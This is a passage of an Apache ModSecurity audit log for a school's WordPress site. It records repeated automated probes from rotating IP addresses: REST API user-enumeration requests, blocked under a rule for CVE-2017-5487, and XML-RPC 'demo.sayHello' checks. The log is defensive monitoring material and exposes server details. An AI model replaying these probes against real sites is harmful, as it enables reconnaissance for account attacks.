in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314327962315 3409 (- - -) Stopwatch2: 1746314327962315 3409; combined=1487, p1=508, p2=947, p3=0, p4=0, p5=32, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90902958-Z-- --4270bf6c-A-- [04/May/2025:06:18:54 +0700] aBakXuchPF6irSergtv8fwAAANU 103.236.140.4 34012 103.236.140.4 8181 --4270bf6c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.117 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4270bf6c-C-- demo.sayHello --4270bf6c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4270bf6c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314334743513 4984 (- - -) Stopwatch2: 1746314334743513 4984; combined=3812, p1=429, p2=3162, p3=26, p4=23, p5=99, sr=66, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4270bf6c-Z-- --e2fca20b-A-- [04/May/2025:06:23:30 +0700] aBalcuchPF6irSergtv8hQAAAMU 103.236.140.4 34048 103.236.140.4 8181 --e2fca20b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e2fca20b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2fca20b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314610066874 3529 (- - -) Stopwatch2: 1746314610066874 3529; combined=1527, p1=494, p2=1000, p3=0, p4=0, p5=32, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2fca20b-Z-- --4fc1d024-A-- [04/May/2025:06:23:35 +0700] aBald-chPF6irSergtv8hwAAAMc 103.236.140.4 34052 103.236.140.4 8181 --4fc1d024-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.119 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4fc1d024-C-- demo.sayHello --4fc1d024-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4fc1d024-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314615374190 5288 (- - -) Stopwatch2: 1746314615374190 5288; combined=4007, p1=526, p2=3269, p3=22, p4=24, p5=96, sr=116, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4fc1d024-Z-- --ad945a0e-A-- [04/May/2025:06:28:17 +0700] aBamkechPF6irSergtv8jAAAANI 103.236.140.4 34082 103.236.140.4 8181 --ad945a0e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ad945a0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad945a0e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314897957427 3224 (- - -) Stopwatch2: 1746314897957427 3224; combined=1307, p1=454, p2=817, p3=0, p4=0, p5=36, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad945a0e-Z-- --17dc8c5b-A-- [04/May/2025:06:28:22 +0700] aBamluchPF6irSergtv8jQAAANQ 103.236.140.4 34086 103.236.140.4 8181 --17dc8c5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.191 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --17dc8c5b-C-- demo.sayHello --17dc8c5b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --17dc8c5b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314902572688 5137 (- - -) Stopwatch2: 1746314902572688 5137; combined=3926, p1=456, p2=3251, p3=22, p4=25, p5=99, sr=67, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17dc8c5b-Z-- --20ebb559-A-- [04/May/2025:07:12:37 +0700] aBaw9fnZiHJYHUAF8QfbuAAAABA 103.236.140.4 34422 103.236.140.4 8181 --20ebb559-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --20ebb559-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --20ebb559-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746317557644156 3363 (- - -) Stopwatch2: 1746317557644156 3363; combined=1466, p1=481, p2=944, p3=0, p4=0, p5=41, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20ebb559-Z-- --c191034a-A-- [04/May/2025:07:12:43 +0700] aBaw-9sVQyl9V2B8Pt-wCQAAAEA 103.236.140.4 34434 103.236.140.4 8181 --c191034a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c191034a-C-- demo.sayHello --c191034a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c191034a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746317563888631 5405 (- - -) Stopwatch2: 1746317563888631 5405; combined=4139, p1=499, p2=3372, p3=30, p4=31, p5=123, sr=71, sw=84, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c191034a-Z-- --07c9b77e-A-- [04/May/2025:07:43:01 +0700] aBa4FechPF6irSergtv8swAAAM4 103.236.140.4 34616 103.236.140.4 8181 --07c9b77e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --07c9b77e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07c9b77e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746319381841448 3143 (- - -) Stopwatch2: 1746319381841448 3143; combined=1305, p1=436, p2=839, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07c9b77e-Z-- --0e40476c-A-- [04/May/2025:07:43:09 +0700] aBa4HWJEE9ao5dcyYWnuVAAAAIE 103.236.140.4 34620 103.236.140.4 8181 --0e40476c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0e40476c-C-- demo.sayHello --0e40476c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e40476c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746319389018408 6272 (- - -) Stopwatch2: 1746319389018408 6272; combined=4563, p1=557, p2=3774, p3=37, p4=40, p5=94, sr=75, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e40476c-Z-- --81f5ca2a-A-- [04/May/2025:08:24:29 +0700] aBbBzdsVQyl9V2B8Pt-wOgAAAEE 103.236.140.4 34900 103.236.140.4 8181 --81f5ca2a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --81f5ca2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81f5ca2a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746321869935637 2974 (- - -) Stopwatch2: 1746321869935637 2974; combined=1267, p1=452, p2=784, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81f5ca2a-Z-- --af53c846-A-- [04/May/2025:08:24:37 +0700] aBbB1WJEE9ao5dcyYWnubAAAAJI 103.236.140.4 34904 103.236.140.4 8181 --af53c846-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.168 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --af53c846-C-- demo.sayHello --af53c846-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --af53c846-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746321877282005 5114 (- - -) Stopwatch2: 1746321877282005 5114; combined=3846, p1=467, p2=3166, p3=23, p4=24, p5=96, sr=66, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af53c846-Z-- --d6313e53-A-- [04/May/2025:08:42:32 +0700] aBbGCNsVQyl9V2B8Pt-wSAAAAEY 103.236.140.4 35072 103.236.140.4 8181 --d6313e53-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d6313e53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6313e53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746322952761530 3184 (- - -) Stopwatch2: 1746322952761530 3184; combined=1306, p1=465, p2=812, p3=0, p4=0, p5=29, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6313e53-Z-- --61361376-A-- [04/May/2025:08:42:36 +0700] aBbGDNsVQyl9V2B8Pt-wSQAAAEI 103.236.140.4 35074 103.236.140.4 8181 --61361376-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.88 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --61361376-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61361376-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746322956623187 3154 (- - -) Stopwatch2: 1746322956623187 3154; combined=1341, p1=493, p2=819, p3=0, p4=0, p5=29, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61361376-Z-- --afaee21f-A-- [04/May/2025:08:42:39 +0700] aBbGD9sVQyl9V2B8Pt-wTAAAAEg 103.236.140.4 35080 103.236.140.4 8181 --afaee21f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.118 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --afaee21f-C-- demo.sayHello --afaee21f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --afaee21f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746322959765603 5279 (- - -) Stopwatch2: 1746322959765603 5279; combined=4002, p1=492, p2=3291, p3=30, p4=32, p5=93, sr=71, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afaee21f-Z-- --afc12b17-A-- [04/May/2025:08:42:44 +0700] aBbGFPnZiHJYHUAF8Qfb3QAAAA4 103.236.140.4 35088 103.236.140.4 8181 --afc12b17-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.88 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --afc12b17-C-- demo.sayHello --afc12b17-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --afc12b17-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746322964898018 5080 (- - -) Stopwatch2: 1746322964898018 5080; combined=3892, p1=585, p2=3100, p3=21, p4=22, p5=95, sr=188, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afc12b17-Z-- --a4dcb81d-A-- [04/May/2025:08:42:55 +0700] aBbGH9sVQyl9V2B8Pt-wUAAAAFA 103.236.140.4 35092 103.236.140.4 8181 --a4dcb81d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a4dcb81d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4dcb81d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746322975231341 3482 (- - -) Stopwatch2: 1746322975231341 3482; combined=1492, p1=467, p2=993, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4dcb81d-Z-- --fceb8623-A-- [04/May/2025:08:43:00 +0700] aBbGJNsVQyl9V2B8Pt-wUgAAAFI 103.236.140.4 35096 103.236.140.4 8181 --fceb8623-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.53 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fceb8623-C-- demo.sayHello --fceb8623-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 